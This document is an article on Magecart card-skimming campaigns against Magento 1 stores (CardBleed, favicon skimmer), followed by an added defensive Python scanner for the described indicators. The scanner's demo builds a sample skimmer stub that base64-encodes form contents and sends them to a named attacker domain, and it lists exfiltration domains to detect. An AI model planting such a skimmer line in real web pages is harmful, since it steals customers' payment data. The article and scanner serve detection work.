Security researchers have recently uncovered a surge in cybercriminal activity against online businesses: more than 2,800 of them, to be exact.
These e-commerce merchants have one thing in common: they are all running Magento 1, an outdated version of the Magento platform.
The attacks have been going on since September, and the researchers who have been tracking them suspect that a single group is behind the chain of online assaults.
Other analysts have also observed supply chain attacks that compromised numerous e-commerce websites at once. These Magecart attacks (the Adverline incident is one example) hit sites running the same outdated Magento software, which has been unsupported since June 2020, and relied on the same exploits. The simultaneous attacks were dubbed "CardBleed," a recently documented attack that abuses the "Magento Connect" function to plant a malicious file named "mysql.php"; that file injects the skimmer code into "prototype.js" and then deletes itself, leaving little trace of how the skimmer got there.
The group has also been credited with the Ant and Cockroach skimmer attacks of August last year, as well as the Magento favicon attack, in which a skimmer was hidden in a favicon file served from "myicons(dot)net." In that campaign the skimmer code was concealed behind fake payment form pages that captured customers' personal information and credit card details. As soon as one operation is shut down, another takes its place, so the skimming never stops. Security researchers state that ever since CardBleed was discovered and made public, the group has scrambled to keep its infrastructure mobile and out of sight: its main skimmer code and exfiltration endpoint were moved from ajaxcloudflare(dot)com to a newly registered domain, consoler(dot)in.
These moves have led researchers to conclude that the group is continuously evolving, devising new skimming techniques and new ways to avoid detection. Given that Magento 1 has reached end of life, the only real mitigation is to upgrade to Magento 2. Until that migration is complete, merchants should at least verify the integrity of the shipped JavaScript (the injected "prototype.js" in CardBleed is the obvious place to look), review the extensions installed through Magento Connect, and watch outbound traffic for unknown domains. Combined with hardened infrastructure and other safety measures, that should help keep e-commerce platforms and the businesses that depend on them operational and protected against further attacks.
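The following scanner turns the indicators described above (a tampered "prototype.js," a leftover "mysql.php" loader, a favicon that is really a script, and references to the two exfiltration domains) into a check a Magento 1 operator can run against a webroot. It is an added example, not code from the article, from the researchers it cites, or from Magento. It assumes the operator keeps a trusted copy of the shipped static files (for example, extracted from the same Magento release archive) in a separate baseline directory; the sample webroot, the appended skimmer stub and the placeholder files are all constructed for the demo.

```python
"""Scan a Magento 1 webroot for the CardBleed-style indicators described in the article.

Added example, not code from the article or from Magento. The skimmer stub written by
build_demo() is constructed for the demo; real payloads are obfuscated and vary.
"""
from __future__ import annotations

import hashlib
import re
import tempfile
from pathlib import Path

# Exfiltration domains named in the article, kept defanged here and refanged at runtime.
DEFANGED_EXFIL_DOMAINS = ["ajaxcloudflare(dot)com", "consoler(dot)in"]
EXFIL_DOMAINS = [d.replace("(dot)", ".") for d in DEFANGED_EXFIL_DOMAINS]

# Name of the self-deleting loader reported in the article. Finding it still on disk
# means the injection either failed or has not finished.
SUSPECT_FILENAMES = {"mysql.php"}

# Shipped static files the skimmer was written into. The operator supplies a trusted
# copy of each under the baseline directory (assumption made for this example).
BASELINE_FILES = ["js/prototype/prototype.js"]

# File types worth grepping for exfiltration domains.
TEXT_SUFFIXES = {".js", ".php", ".phtml", ".html", ".ico"}


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def scan_webroot(webroot: str, baseline: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing was flagged."""
    root, base = Path(webroot), Path(baseline)
    findings: list[str] = []

    # 1. Integrity: the live prototype.js must match the trusted copy byte for byte.
    for rel in BASELINE_FILES:
        live, good = root / rel, base / rel
        if not live.is_file():
            continue
        if not good.is_file():
            findings.append(f"{rel}: no baseline copy, cannot verify")
        elif sha256_of(live) != sha256_of(good):
            findings.append(f"{rel}: differs from baseline (possible injected skimmer)")

    # 2. File-name, file-type and content checks across the whole tree.
    domain_re = re.compile("|".join(re.escape(d) for d in EXFIL_DOMAINS))
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name in SUSPECT_FILENAMES:
            findings.append(f"{rel}: unexpected loader file present")
        if path.suffix not in TEXT_SUFFIXES:
            continue
        data = path.read_bytes()
        # A "favicon" that carries neither an ICO nor a PNG header is a place to hide script.
        if path.suffix == ".ico" and not data.startswith((b"\x00\x00\x01\x00", b"\x89PNG")):
            findings.append(f"{rel}: .ico file without an image header")
        if domain_re.search(data.decode("utf-8", "ignore")):
            findings.append(f"{rel}: references a known exfiltration domain")
    return findings


def build_demo() -> tuple[str, str]:
    """Construct a throwaway baseline and a tampered webroot (sample data, not a real site)."""
    tmp = Path(tempfile.mkdtemp())
    baseline, webroot = tmp / "baseline", tmp / "webroot"
    for d in (baseline, webroot):
        (d / "js" / "prototype").mkdir(parents=True)
    clean_js = b"/* stand-in for the shipped Prototype library */\nvar Prototype = {};\n"
    (baseline / BASELINE_FILES[0]).write_bytes(clean_js)
    # Tampered copy: a constructed skimmer stub appended after the legitimate code,
    # pointing at the newer of the two domains named in the article.
    stub = (
        "\n;(function(){var u='https://" + EXFIL_DOMAINS[1] + "/';"
        "document.addEventListener('submit',function(){"
        "new Image().src=u+btoa(document.forms[0].innerText);});})();\n"
    )
    (webroot / BASELINE_FILES[0]).write_bytes(clean_js + stub.encode())
    (webroot / "mysql.php").write_bytes(b"<?php /* loader placeholder */\n")
    (webroot / "favicon.ico").write_bytes(b"<?php /* script masquerading as an icon */\n")
    return str(webroot), str(baseline)


if __name__ == "__main__":
    tampered, trusted = build_demo()
    for line in scan_webroot(tampered, trusted):
        print("FLAG", line)
    print("clean baseline:", scan_webroot(trusted, trusted))
```

The integrity check is the one that matters: domain matching only catches the infrastructure the article names and is defeated the next time the group moves domains or hex-encodes the string, whereas a byte-for-byte comparison against the release's own "prototype.js" flags any injected code regardless of where it exfiltrates to. Expect the .ico check to flag sites that legitimately serve some other image format under that name; treat it as a prompt to look, not as proof.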